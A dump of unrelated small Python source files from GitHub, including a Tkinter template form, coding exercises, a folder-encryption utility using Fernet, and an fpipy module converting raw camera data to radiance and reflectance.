self.BindKeyName(3,False))\n cmbvar_2_SectionName.bind(\"<>\", lambda event: self.BindKeyName(3,True))\n cmbvar_2_KeyName.bind(\"<>\", lambda event: self.BindKeyName(3,False))\n\n\n # ttk.Label(self.chdFrm2,text = \"Right IOValue :\" ).grid(row=3,column = 2,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.E)\n # ttk.Entry(self.chdFrm2, width = 26, textvariable = self.var_rightIOValue).grid(row=3,column = 3,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.W)\n ttk.Label(self.chdFrm2,text = \"False Next ActionId :\" ).grid(row=4,column = 2,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.E)\n ttk.Entry(self.chdFrm2, width = 26, textvariable = self.var_falseActionId).grid(row=4,column = 3,padx=(10, 10), pady=(5, 2), sticky=tk.N+tk.S+tk.W)\n ttk.Button(chdFrm, text =\"Save\", width=10, command =lambda: self.fncAddAction(containter)).grid(row=5,column = 1 , padx=(10,0),pady=(3,5),sticky=tk.N+tk.W)\n containter.grab_set()\n self.fncChangeActionType(None) \n self.fncChangeInputType(None,1)\n self.fncChangeInputType(None,2)\n self.fncChangeInputType(None,3)\n containter.protocol(\"WM_DELETE_WINDOW\", lambda :self.fncCloseInnerChild(containter))\n cmbActionType.bind(\"<>\", lambda event: self.fncChangeActionType(event))\n cmbInputType.bind(\"<>\", lambda event: self.fncChangeInputType(event,1))\n cmbLeftInputType.bind(\"<>\", lambda event: self.fncChangeInputType(event,2))\n cmbRightInputType.bind(\"<>\", lambda event: self.fncChangeInputType(event,3))\n \n\n def fncCloseInnerChild(self,container): \n self.ContainerFrame.children[\"frmChildForm\"].focus_set()\n self.ContainerFrame.children[\"frmChildForm\"].grab_set()\n container.destroy()\n\n def fncAddAction(self,container):\n if(self.var_actionId==None or self.var_actionId.get()==\"\" ):\n messagebox.showerror(\"Required\", \"Required Action Id\")\n return\n if(self.var_actionType==None or self.var_actionType.get()==\"\" ):\n messagebox.showerror(\"Required\", \"Required Action Type\")\n return\n if(self.var_ActionStartupType==None or self.var_ActionStartupType.get()==\"\"):\n messagebox.showerror(\"Required\", \"Required startup type\")\n return\n if(self.var_actionType.get()==\"Wait\"):\n if(self.var_manualValue==None or self.var_manualValue.get()==\"\"):\n messagebox.showerror(\"Required\", \"Required Manual Value\")\n return\n elif(not (self.var_actionType.get()==\"Condition\" or self.var_actionType.get()==\"Find Index\")) :\n if(self.var_controlSelectorType==None or self.var_controlSelectorType.get()==\"\"):\n messagebox.showerror(\"Required\", \"Required Selector Type\")\n return\n if(self.var_control==None or self.var_control.get()==\"\"):\n messagebox.showerror(\"Required\", \"Required Control\")\n return\n if(self.var_inputType==None or self.var_inputType.get()==\"\"):\n messagebox.showerror(\"Required\", \"Required Input Type\")\n return\n if(self.var_inputType.get()==\"ManualValue\"):\n if(self.var_manualValue==None or self.var_manualValue.get()==\"\"):\n messagebox.showerror(\"Required\", \"Required Manual Value\")\n return\n else:\n if(self.var_ioValue==None or self.var_ioValue.get()==\"\"):\n messagebox.showerror(\"Required\", \"Required IO Value\")\n return\n if(self.var_nextActionId==None or self.var_nextActionId.get()==\"\"):\n messagebox.showerror(\"Required\", \"Required Next Action Id\")\n return\n else:\n if(self.var_conditionType==None or self.var_conditionType.get()==\"\"):\n messagebox.showerror(\"Required\", \"Required Condition Type\")\n return\n if(self.var_leftInputType==None or self.var_leftInputType.get()==\"\"):\n messagebox.showerror(\"Required\", \"Required Left Input Type\")\n return\n if(self.var_leftInputType.get()==\"ManualValue\"):\n if(self.var_leftManualValue==None or self.var_leftManualValue.get()==\"\"):\n messagebox.showerror(\"Required\", \"Required Left Manual Value\")\n return\n else:\n if(self.var_leftIOValue==None or self.var_leftIOValue.get()==\"\"):\n messagebox.showerror(\"Required\", \"Required Left IO Value\")\n return\n if(self.var_rightInputType==None or self.var_rightInputType.get()==\"\"):\n messagebox.showerror(\"Required\", \"Required Right Input Type\")\n return\n if(self.var_rightInputType.get()==\"ManualValue\"):\n if(self.var_rightManualValue==None or self.var_rightManualValue.get()==\"\"):\n messagebox.showerror(\"Required\", \"Required Right Manual Value\")\n return\n else:\n if(self.var_rightIOValue==None or self.var_rightIOValue.get()==\"\"):\n messagebox.showerror(\"Required\", \"Required Right IO Value\")\n return\n\n if(self.var_trueActionId==None or self.var_trueActionId.get()==\"\"):\n messagebox.showerror(\"Required\", \"Required True Action Id\")\n return\n if(self.var_falseActionId==None or self.var_falseActionId.get()==\"\"):\n messagebox.showerror(\"Required\", \"Required False Action Id\")\n return\n if(self.IsUpdateAction):\n self.treev2.delete(self.treev2_selected_items)\n self.treev2.insert(\"\", self.treev2_selected_index,values =(self.var_actionId.get(), self.var_actionType.get(),self.var_ActionStartupType.get(),\n self.var_controlSelectorType.get(),self.var_control.get(),self.var_inputType.get(),self.var_manualValue.get(),self.var_ioValue.get(),self.var_nextActionId.get(),\n self.var_conditionType.get(),self.var_leftInputType.get(),self.var_leftManualValue.get(),self.var_leftIOValue.get(),self.var_trueActionId.get(),\n self.var_rightInputType.get(),self.var_rightManualValue.get(),self.var_rightIOValue.get(),self.var_falseActionId.get()\n ))\n self.IsUpdateAction=False\n else:\n self.treev2.insert(\"\", 'end',values =(self.var_actionId.get(), self.var_actionType.get(),self.var_ActionStartupType.get(),\n self.var_controlSelectorType.get(),self.var_control.get(),self.var_inputType.get(),self.var_manualValue.get(),self.var_ioValue.get(),self.var_nextActionId.get(),\n self.var_conditionType.get(),self.var_leftInputType.get(),self.var_leftManualValue.get(),self.var_leftIOValue.get(),self.var_trueActionId.get(),\n self.var_rightInputType.get(),self.var_rightManualValue.get(),self.var_rightIOValue.get(),self.var_falseActionId.get()\n ))\n #reset the data\n self.var_control.set(\"\")\n self.var_manualValue.set(\"\")\n self.var_leftManualValue.set(\"\")\n self.var_rightInputType.set(\"\")\n self.var_actionId.set(\"\")\n self.var_nextActionId.set(\"\")\n self.var_trueActionId.set(\"\")\n self.var_falseActionId.set(\"\")\n self.var_ActionStartupType.set(\"Middle\")\n self.chdFrm1.children[\"txtControl\"].focus_set() \n\n messagebox.showinfo(\"Success\", \"Action added successfully\")\n\n\n \n\nif __name__ == '__main__':\n config= Gc.GenerateConfig() \n \n root = tk.Tk()\n sizex = 600\n sizey = 400\n posx = 100\n posy = 100\n root.wm_geometry(\"%dx%d+%d+%d\" % (sizex, sizey, posx, posy))\n config.set_theme(None,root)\n config.set_icons()\n myframe=tk.Frame(root,relief=tk.GROOVE,width=500,height=600,bd=1)\n myframe.pack( fill=\"both\" ,expand=tk.TRUE ,anchor=tk.N+tk.W) \n AddTemplate(myframe,config)\n root.eval('tk::PlaceWindow . center')\n root.mainloop()\n","repo_name":"xyzprabhakar/AFill","sub_path":"frmAddTemplate.py","file_name":"frmAddTemplate.py","file_ext":"py","file_size_in_byte":69516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31459952333","text":"import sys\nf1 = open (sys.argv[1])\nf2 = open (sys.argv[2], \"r+\")\nr1 = f1.read()\nv1 = r1.split()\nd = {}\ni = 0\nfor key in set (v1):\n d [key] = v1.count (key)\nfor k, m in sorted(d.items(), key = lambda x: -x[1]):\n if i < 10:\n print (\" \" + str (m) + \": \" + str (k))\n f2.write (\" \" + str (m) + \" \" + str (k) + \"\\n\")\n i += 1\n else:\n break\nf1.close ()\nf2.close ()\n","repo_name":"YajimaxYuki/kadai2018","sub_path":"trial/freq.py","file_name":"freq.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28012562","text":"#when we reach the end of the queue, we start from the beginning of the queue.\nclass MyCircularQueue:\n\n def __init__(self, k):\n self.k = k\n self.queue = [None] * k\n self.head = self.tail = -1\n\n# Insert an element into the circular queue\n# 1. check queue full\n# 2. check if queue is first put\n# 3. enqueue\n\n def enqueue(self, data):\n if ((self.tail + 1) % self.k == self.head):\n print(\"The circular queue is full\\n\")\n\n elif (self.head == -1):\n self.head = 0\n self.tail = 0\n self.queue[self.tail] = data\n\n else:\n self.tail = (self.tail + 1) % self.k\n self.queue[self.tail] = data\n\n\n# Delete an element from the circular queue\n# 1. check queue is empty\n# 2. check if queue is last output\n# 3. dequeue\n\n def dequeue(self):\n if (self.head == -1):\n print(\"The queue is empty\")\n\n #only one element\n elif (self.head == self.tail):\n temp = self.queue[self.head]\n self.head = -1\n self.tail = -1\n return temp\n\n else:\n temp = self.queue[self.head]\n self.head = (self.head + 1) % self.k\n return temp\n\n def printQueue(self):\n if (self.head == -1):\n print(\"No element in the circular queue\")\n elif (self.tail > self.head):\n for i in range(self.head, self.tail + 1):\n print(self.queue[i], end=\"\")\n print()\n else:\n for i in range(self.head, self.k):\n print(self.queue[i], end=\" \")\n for i in range(0, self.tail + 1):\n print(self.queue[i], end=\" \")\n print()\n","repo_name":"dongjun-Yi/DataStructure-study","sub_path":"queue_python/circularQueue.py","file_name":"circularQueue.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3606689034","text":"n, m = [int(x) for x in input().split(', ')]\n\nmatrix = []\n\nfor x in range(n):\n elements = [int(x) for x in input().split(', ')]\n matrix.append(elements)\n\n\ndef get_sum_of_submatrix(matrix, row_index, column_index, size):\n the_sum = 0\n\n for r in range(row_index, row_index + size):\n for c in range(column_index, column_index + size):\n the_sum += matrix[r][c]\n\n return the_sum\n\n\nSIZE = 2\n\n\ndef get_the_best_sum(matrix, size):\n\n best_sum = get_sum_of_submatrix(matrix, 0, 0, size)\n best_row_index = 0\n best_column_index = 0\n\n for r in range(len(matrix) - size + 1):\n for c in range(len(matrix[r]) - size + 1):\n current_sum = get_sum_of_submatrix(matrix, r, c, size)\n\n if best_sum < current_sum:\n best_sum = current_sum\n best_row_index = r\n best_column_index = c\n\n return best_row_index, best_column_index\n\n\ndef print_result(coordinates, size):\n (row_index, col_index) = coordinates\n\n for r in range(row_index, row_index + size):\n row = []\n for c in range(col_index, col_index + size):\n row.append(matrix[r][c])\n\n print(' '.join(str(s) for s in row))\n print(get_sum_of_submatrix(matrix, row_index, col_index, size))\n\n\ncoordinates = get_the_best_sum(matrix, SIZE)\nprint_result(coordinates, SIZE)\n\na = 5","repo_name":"Velin-Todorov/SoftUni","sub_path":"Multidimensional lists/square with maximum sum.py","file_name":"square with maximum sum.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"3793361584","text":"from math import gcd\n\nstr1 = \"ABCABC\"\nstr2 = \"ABC\"\n\nstr1 = \"ABABAB\"\nstr2 = \"ABAB\"\n\n# str1 = \"LEET\"\n# str2 = \"CODE\"\n\n\ndef gcdOfStrings(str1: str, str2: str) -> str:\n n1 = len(str1)\n n2 = len(str2)\n n = min(n1, n2)\n while n > 0:\n if n1 % n == 0 and n2 % n == 0:\n result = str1[:n]\n m1 = n1//n\n m2 = n2//n\n if str1 == m1*result and str2 == m2*result:\n return result\n n -= 1\n return ''\n\nprint(gcdOfStrings(str1, str2))\n\nprint(str1[:gcd(len(str1), len(str2))])","repo_name":"gauthierbeaudoux/LeetCode","sub_path":"1071_GreatestCommonDivisorStrings.py","file_name":"1071_GreatestCommonDivisorStrings.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30557309385","text":"from sklearn import model_selection, svm, metrics\nimport glob, os.path,re, json\nimport pandas as pd\n\ncsv = pandas.read_csv(\"iris.csv\")\ndata = csv[[\"SepalLength\",\"SepalWidth\",\"PetalLength\",\"PetalWidth\"]]\nlabel = csv[\"Name\"]\n\ntrain_data, test_data, train_label, test_label =\\\n train_test_split(data,label)\n\nclf = svm.SVC()\nclf.fit(train_data,train_label)\nresult = clf.predict(test_data)\nprint(result)\nscore = metrics.accuracy_score(result,test_label)\nprint(score)","repo_name":"hanwjdgh/Docker-M-D-learning","sub_path":"sklearn/sklearn2.py","file_name":"sklearn2.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19922897545","text":"import os\nfrom cryptography.fernet import Fernet\n\n\n#creates list that will be used to know what to encrypt\nmyfile = open(\"usrinput.txt\")\nfolder = myfile.read()\nmyfile.close()\n\n#defining the directory we want\n\ndirec = os.listdir(folder)\n\n\nkey = Fernet.generate_key()\n \n\nos.chdir(folder)\n\nfor file in direc:\n if file == \"Encrypt.py\":\n direc.remove(\"Encrypt.py\")\n if file == \"README.md\":\n direc.remove(\"README.md\") \n if file == \"Decrypt.py\":\n direc.remove(\"Decrypt.py\") \n if file == \"gitignore\":\n direc.remove(\"gitignore\") \n\nlistlen = len(direc)\nlistcheck = 0\nfor file in direc:\n if file == \"cryptkey.key\":\n input(\"it seems that you already have a key would you like to use it? (y/n)\")\n if input == \"y\":\n with open(\"cryptkey.key\", \"wb\") as cryptkey:\n cryptkey.write(key) \n continue\n if input == \"n\":\n delete = input(\"would you like to delete the key and create a new one? (y/n)\")\n if delete == \"y\":\n with open(\"cryptkey.key\", \"wb\") as cryptkey:\n cryptkey.write(key) \n continue\n if delete == \"n\":\n exit()\n if file != \"cryptkey.key\":\n listcheck += 1\n print(\"listcheck =\", listcheck)\n print(\"listlen\", listlen)\n if listcheck == listlen:\n print(\"it apears you have do not have a key, ome will be generated for you\")\n with open(\"cryptkey.key\", \"wb\") as cryptkey:\n cryptkey.write(key)\n continue\n\n\n\n\ndirec.remove(\"cryptkey.key\")\n \n \nfor file in direc:\n print(file)\n with open(file, \"rb\") as thefile:\n contents = thefile.read()\n contents_encrypted = Fernet(key).encrypt(contents)\n with open(file, \"wb\") as thefile:\n thefile.write(contents_encrypted)\n\nprint(\"encrypted succesfully\")\n","repo_name":"FlMonkey/Encryptapp","sub_path":"Encrypt.py","file_name":"Encrypt.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36852224244","text":"BITU_VERIFIEDS_FILE = 'https://explorer.brightid.org/history/bitu_verified.json'\nBITU_FILE = '/tmp/bitu.json'\nBACKUP_URL = 'https://explorer.brightid.org/backups/brightid.tar.gz'\nFILTER_FILES_DIR = './bitu_updater/suspicious_conns'\nREGIONS_FILE = './bitu_updater/regions.json'\nRAR_ADDR = '/tmp/brightid.tar.gz'\nBACKUP_ADDR = '/tmp/brightid'\nBITU_ELIGIBLES_FILE = '/tmp/bitu_eligibles.json'\nBRIGHTID_JSON_FILE = '../brightid.json.gz'\nLAST_SUSPICIOUS_CONNS_CHECK = './bitu_updater/last_suspicious_conns_check'\nDEFAULT_QUOTA = 50\nDIRECT_PENALTY = 5\nINDIRECT_PENALTY = 1\nARANGO_SERVER_ENDPOINT = 'http://localhost:8529'\nARANGO_DB_NAME = '_system'\nCUTS_JSON_FILE = '../cuts.json'\n","repo_name":"BrightID/BrightID-Explorer","sub_path":"scripts/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"18816903984","text":"char = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'\nchar = list(char)\ndef xoay(a):\n giaTriXoay = 0\n for i in range(len(a)):\n giaTriXoay += char.index(a[i])\n for i in range(len(a)):\n id = ( char.index(a[i]) + giaTriXoay ) % 26\n a[i] = char[id]\n return a\n\n\n_t = int(input())\nfor _ in range(_t):\n s = input()\n a = list( s[0:int(len(s)/2)] )\n b = list( s[int(len(s)/2):len(s)] )\n a = xoay(a)\n b = xoay(b)\n for i in range(len(a)):\n id = ( char.index(a[i]) + char.index(b[i]) ) % 26\n a[i] = char[id]\n for i in a: print(i, end='')\n print('')\n","repo_name":"NguyenVanDuc0405/Code_Python_PTIT","sub_path":"mahoa3.py","file_name":"mahoa3.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21404813099","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Functions for manipulating raw CFA data.\n\nExample\n-------\nCalculating radiances from raw data and plotting them can be done as follows::\n\n import xarray as xr\n import fpipy as fpi\n import matplotlib\n import os.path as osp\n from fpipy.data import house_raw\n\n\n data = house_raw() # Example raw data (including dark current)\n rad = fpi.raw_to_radiance(data)\n rad.swap_dims({'band': 'wavelength'}).radiance.sel(wavelength=600,\n method='nearest').plot()\n\"\"\"\nfrom enum import IntEnum\nimport xarray as xr\nimport numpy as np\nimport colour_demosaicing as cdm\nfrom . import conventions as c\n\n\ndef raw_to_reflectance(raw, whiteraw, keep_variables=None):\n \"\"\"Performs demosaicing and computes radiance from RGB values.\n\n Parameters\n ----------\n raw : xarray.Dataset\n A dataset containing the following variables:\n `c.cfa_data`,\n `c.dark_reference_data`,\n `c.sinv_data`,\n `c.wavelength_data´,\n `c.fwhm_data`\n `c.camera_exposure`\n\n white : xarray.Dataset\n Same as raw but for a cube that describes a white reference target.\n\n keep_variables: list-like, optional\n List of variables to keep in the result, default None.\n If you wish to keep the intermediate data, pass the relevant\n names from `fpipy.conventions`.\n\n Returns\n -------\n reflectance: xarray.Dataset or xarray.DataArray\n Includes computed radiance and reflectance as data variables sorted by\n wavelength or just the reflectance DataArray.\n \"\"\"\n radiance = raw_to_radiance(raw, keep_variables=keep_variables)\n white = raw_to_radiance(whiteraw, keep_variables=keep_variables)\n return radiance_to_reflectance(\n radiance, white,\n keep_variables=keep_variables\n )\n\n\ndef radiance_to_reflectance(radiance, white, keep_variables=None):\n \"\"\"Computes reflectance from radiance and a white reference cube.\n\n Parameters\n ----------\n radiance : xarray.Dataset\n Dataset containing the image(s) to divide by the references.\n\n white : xarray.Dataset\n White reference image(s).\n\n keep_variables: list-like, optional\n List of variables to keep in the result, default None.\n If you wish to keep the intermediate data, pass the relevant\n names from `fpipy.conventions`.\n\n Returns\n -------\n reflectance: xarray.Dataset\n Dataset containing the reflectance and the original metadata for both\n datasets indexed by measurement type.\n \"\"\"\n\n res = xr.concat(\n [radiance, white],\n dim=xr.DataArray(\n ['sample', 'white_reference'],\n dims=(c.measurement_type,),\n name=c.measurement_type,\n ),\n )\n res[c.reflectance_data] = (\n radiance[c.radiance_data] / white[c.radiance_data]\n ).assign_attrs({\n 'long_name': 'reflectance',\n 'units': '1',\n })\n\n return _drop_variable(res, c.radiance_data, keep_variables)\n\n\ndef raw_to_radiance(raw, **kwargs):\n \"\"\"Performs demosaicing and computes radiance from RGB values.\n\n Parameters\n ----------\n raw : xarray.Dataset\n A dataset containing the following variables:\n `c.sinv_data`,\n `c.wavelength_data´,\n `c.fwhm_data`\n `c.camera_exposure`\n `c.cfa_data`,\n `c.dark_reference_data`,\n\n dm_method : str, optional\n **{'bilinear', 'DDFAPD', 'Malvar2004', 'Menon2007'}**\n Demosaicing method. Default is 'bilinear'. See the `colour_demosaicing`\n package for more info on the different methods.\n\n keep_variables: list-like, optional\n List of variables to keep in the result, default None.\n If you wish to keep the intermediate data, pass the relevant\n names from `fpipy.conventions`.\n\n Returns\n -------\n radiances: xarray.Dataset\n Includes computed radiance sorted by wavelength along with original\n metadata.\n \"\"\"\n\n # Calculate radiances from each mosaic image (see _raw_to_rad)\n radiances = raw.groupby(c.image_index).apply(_raw_to_rad, **kwargs)\n\n # Create a band coordinate including all possible peaks from each index\n # and then drop any that don't actually have data\n # (defined by c.number_of_peaks)\n radiances = radiances.stack(\n **{c.band_index: (c.image_index, c.peak_coord)}\n )\n radiances = radiances.sel(\n **{c.band_index:\n radiances[c.peak_coord] <= radiances[c.number_of_peaks]}\n )\n\n # Sort ascending by wavelength\n radiances = radiances.sortby(c.wavelength_data)\n\n # Replace the MultiIndex band coordinate with the\n # explicit values (0...nbands)\n radiances = radiances.reset_index(c.band_index)\n radiances = radiances.assign_coords(\n **{c.band_index: radiances[c.band_index] + 1}\n )\n\n return radiances\n\n\ndef _raw_to_rad(raw, dm_method='bilinear', keep_variables=None):\n \"\"\"Compute all passband peaks from given raw image data.\n\n Applies subtract_dark, _raw_to_rgb and _rgb_to_rad\n sequentially to compute radiance from raw image mosaics.\n\n Parameters\n ----------\n raw : xr.Dataset\n Dataset containing raw CFA data and the dark reference\n to be passed through `subtract_dark`, `_raw_to_rgb` and `_rgb_to_rad`.\n\n dm_method : str, optional\n Demosaicing method passed to _rgb_to_rad. Default 'bilinear'.\n\n keep_variables: list-like, optional\n List of variables to keep in the result, default None.\n If you wish to keep the intermediate data, pass the relevant\n names from `fpipy.conventions`.\n\n Returns\n -------\n res: xr.Dataset\n Dataset containing radiance data and the relevant metadata.\n\n \"\"\"\n return raw.pipe(\n subtract_dark, keep_variables\n ).pipe(\n _raw_to_rgb, dm_method, keep_variables\n ).pipe(\n _rgb_to_rad, keep_variables\n )\n\n\ndef _raw_to_rgb(raw, dm_method, keep_variables=None):\n \"\"\"Demosaic a dataset of CFA data.\n\n Parameters\n ----------\n raw: xr.Dataset\n Dataset containing `c.dark_corrected_cfa_data` and mosaic pattern\n information either as a variable or an attribute of the cfa variable.\n\n keep_variables: list-like, optional\n List of variables to keep in the result, default None.\n If you wish to keep the raw CFA data, pass a list including\n `fpipy.conventions.cfa_data`.\n\n Returns\n -------\n res: xr.Dataset\n Dataset containing the demosaiced R, G and B layers as a variable.\n \"\"\"\n attrs = raw[c.dark_corrected_cfa_data].attrs\n if c.cfa_pattern_data in raw:\n pattern = str(raw[c.cfa_pattern_data].values)\n elif c.genicam_pattern_data in raw:\n pattern = str(raw[c.genicam_pattern_data].values)\n elif c.cfa_pattern_data in attrs:\n pattern = str(attrs[c.cfa_pattern_data])\n elif c.genicam_pattern_data in attrs:\n pattern = str(attrs[c.genicam_pattern_data])\n else:\n raise ValueError('Bayer pattern not specified.')\n\n raw[c.rgb_data] = demosaic(\n raw[c.dark_corrected_cfa_data],\n pattern,\n dm_method\n )\n\n return _drop_variable(raw, c.dark_corrected_cfa_data, keep_variables)\n\n\ndef _rgb_to_rad(rgb, keep_variables=None):\n \"\"\"Calculate all possible radiance bands from a given RGB image.\n\n Parameters\n ----------\n rgb: xr.DataSet\n Dataset containing as variables RGB image, exposure and radiance\n inversion information.\n\n keep_variables: list-like, optional\n List of variables to keep in the result, default None.\n If you wish to keep the RGB data, pass a list including\n `fpipy.conventions.rgb_data`.\n\n Returns\n -------\n radiance: xr.Dataset\n Dataset containing radiances for each passband peak as a variable.\n\n \"\"\"\n\n # Retrieve exposure time\n if c.camera_exposure in rgb:\n exposure = rgb[c.camera_exposure].data\n elif c.genicam_exposure in rgb: # GenICam uses microseconds\n exposure = rgb[c.genicam_exposure].data * 0.001\n elif c.camera_exposure in rgb[c.rgb_data].attrs:\n exposure = rgb[c.rgb_data].attrs[c.camera_exposure]\n elif c.genicam_exposure in rgb[c.rgb_data].attrs:\n exposure = rgb[c.rgb_data].attrs[c.genicam_exposure] * 0.001\n else:\n raise ValueError('Exposure time not specified.')\n\n # Select only peaks that have data (as defined by c.number_of_peaks)\n rgb = rgb.sel(\n **{c.peak_coord: rgb[c.peak_coord] <= rgb[c.number_of_peaks]}\n )\n\n # Compute the inversion to radiance and scale by exposure time\n rgb[c.radiance_data] = rgb[c.sinv_data].dot(rgb[c.rgb_data]) / exposure\n\n # Add CF attributes\n rgb[c.radiance_data] = rgb[c.radiance_data].assign_attrs({\n 'long_name': 'radiance per unit wavelength',\n 'units': 'W sr-1 m-2 nm-1',\n })\n\n return _drop_variable(rgb, c.rgb_data, keep_variables)\n\n\ndef subtract_dark(ds, keep_variables=None):\n \"\"\"Subtracts dark current reference from image data.\n\n Subtracts a dark reference frame from all the layers in the given raw data\n and clamps any negative values in the result to zero. The result is stored\n in the dataset as the variable `c.dark_corrected_cfa_data` which is\n overwritten if it exists.\n\n Parameters\n ----------\n ds: xarray.DataSet\n Dataset containing the raw images in `fpipy.conventions.cfa_data`\n and the dark current reference measurement as\n `fpipy.conventions.dark_reference_data`.\n\n keep_variables: list-like, optional\n List of variables to keep in the result, default None.\n If you wish to keep the dark reference data and/or the original raw\n images, pass a list including the variable names.\n\n Returns\n -------\n xarray.Dataset\n Dataset with the dark corrected data as\n `fpipy.conventions.dark_corrected_cfa_data`\n\n \"\"\"\n\n ds[c.dark_corrected_cfa_data] = xr.apply_ufunc(\n _subtract_clip, ds[c.cfa_data], ds[c.dark_reference_data],\n dask='parallelized',\n output_dtypes=[\n np.result_type(ds[c.cfa_data], ds[c.dark_reference_data])\n ],\n )\n\n ds = _drop_variable(ds, c.cfa_data, keep_variables)\n ds = _drop_variable(ds, c.dark_reference_data, keep_variables)\n return ds\n\n\ndef _subtract_clip(x, y):\n \"\"\"Subtract y from x and clip to non-negative values.\n\n Retains numerical type of x and y without introducing underflows.\n \"\"\"\n result = (x > y) * (x - y)\n return result\n\n\nclass BayerPattern(IntEnum):\n \"\"\"Enumeration of the Bayer Patterns as used by FPI headers.\"\"\"\n GBRG = 0\n GRBG = 1\n BGGR = 2\n RGGB = 3\n\n # Lowercase aliases.\n gbrg = 0\n grbg = 1\n bggr = 2\n rggb = 3\n\n # Aliases (GenICam PixelColorFilter values)\n BayerGB = 0\n BayerGR = 1\n BayerBG = 2\n BayerRG = 3\n\n @classmethod\n def get(self, pattern):\n try:\n return self[pattern]\n except (KeyError, AttributeError):\n return self(pattern)\n\n def __str__(self):\n return self.name\n\n\ndef demosaic(cfa, pattern, dm_method):\n \"\"\"Perform demosaicing on a DataArray.\n\n Parameters\n ----------\n cfa: xarray.DataArray\n Array containing a stack of CFA images.\n\n pattern: BayerPattern or str\n Bayer pattern used to demosaic the CFA.\n\n dm_method: str\n\n Returns\n -------\n xarray.DataArray\n \"\"\"\n pattern = BayerPattern.get(pattern).name\n\n dm_methods = {\n 'bilinear': cdm.demosaicing_CFA_Bayer_bilinear,\n 'Malvar2004': cdm.demosaicing_CFA_Bayer_Malvar2004,\n 'Menon2007': cdm.demosaicing_CFA_Bayer_Menon2007,\n }\n dm_alg = dm_methods[dm_method]\n\n res = xr.apply_ufunc(\n dm_alg,\n cfa,\n kwargs=dict(pattern=pattern),\n input_core_dims=[(c.height_coord, c.width_coord)],\n output_core_dims=[(c.RGB_dims)],\n dask='parallelized',\n output_dtypes=[np.float64],\n output_sizes={c.colour_coord: 3}\n )\n res.coords[c.colour_coord] = ['R', 'G', 'B']\n return res\n\n\ndef _drop_variable(ds, variable, keep_variables):\n \"\"\"Drop a given variable from the dataset unless whitelisted.\n\n Parameters\n ----------\n\n ds : xr.Dataset\n Dataset to drop variable from.\n\n variable : str\n Variable name to drop.\n\n keep_variables : list-like\n Whitelist of variables to keep.\n\n Returns\n -------\n xr.Dataset\n Original dataset with or without the given variable.\n \"\"\"\n if not keep_variables or variable not in keep_variables:\n return ds.drop(variable)\n else:\n return ds\n","repo_name":"silmae/fpipy","sub_path":"fpipy/raw.py","file_name":"raw.py","file_ext":"py","file_size_in_byte":12852,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"26407728896","text":"import numpy as np\n\ndef random_uniform(l,u):\n\treturn max(10e-8, np.random.uniform(l,u))\n\nclass QPSO:\n\tdef __init__(self, objective, swarm_size, n_dimensions, lb,ub,g, max_iterations = 500):\n\t\tself.objective = objective\n\t\tself.swarm_size = swarm_size\n\t\tself.n_dimensions = n_dimensions\n\t\tself.ub = ub\n\t\tself.lb = lb\n\t\tself.pos = np.zeros((swarm_size, n_dimensions))\n\t\tself.g = g \n\t\tself.max_iterations = max_iterations\n\n\n\t\tif(self.n_dimensions != len(lb) or self.n_dimensions != len(ub)):\n\t\t\traise Exception\n\n\tdef __initialize_swarm_particles(self):\n\n\t\tfor i in range(self.swarm_size):\n\t\t\tfor j in range(self.n_dimensions):\n\t\t\t\tself.pos[i][j] = np.random.uniform(self.lb[j], self.ub[j])\n\t\t\n\t\tself.lbest = self.pos.copy()\n\n\t\tfunc_values = [self.objective(x) for x in self.pos]\n\n\t\tix_best = np.argmin(func_values)\n\n\t\tself.gbest = self.lbest[ix_best].copy()\n\n\tdef __update_positions(self):\n\t\tfor i in range(self.swarm_size):\n\t\t\tfor j in range(self.n_dimensions):\n\t\t\t\tpsi_1 = random_uniform(0,1)\n\t\t\t\tpsi_2 = random_uniform(0,1)\n\t\t\t\tP = (psi_1*self.lbest[i][j] + psi_2 * self.gbest[j])/(psi_1 + psi_2)\n\t\t\t\tu = random_uniform(0,1)\n\t\t\t\t# self.g = random_uniform(0.5,0.99)\n\t\t\t\tL = 1/self.g * np.abs(self.pos[i][j] - P)\n\t\t\t\tchi = (self.ub[j] - self.lb[j]) / 1000.0\n\t\t\t\tif random_uniform(0,1) > 0.5:\n\t\t\t\t\tself.pos[i][j] = P - chi*L*np.log(1/u)\n\t\t\t\telse:\n\t\t\t\t\tself.pos[i][j] = P + chi*L*np.log(1/u)\n\n\tdef __update_best_positions(self):\n\t\tfunc_values = []\n\t\tfor i in range(self.swarm_size):\n\t\t\tf1 = self.objective(self.pos[i])\n\t\t\tf2 = self.objective(self.lbest[i])\n\t\t\t\n\t\t\tif(f1 < f2):\n\t\t\t\tself.lbest[i] = self.pos[i].copy()\n\t\t\t\tfunc_values.append(f1)\n\t\t\telse:\n\t\t\t\tfunc_values.append(f2)\n\n\t\tix_best = np.argmin(func_values)\n\t\tself.gbest = self.lbest[ix_best].copy()\n\n\n\tdef run(self):\n\t\tself.__initialize_swarm_particles()\n\t\tfor i in 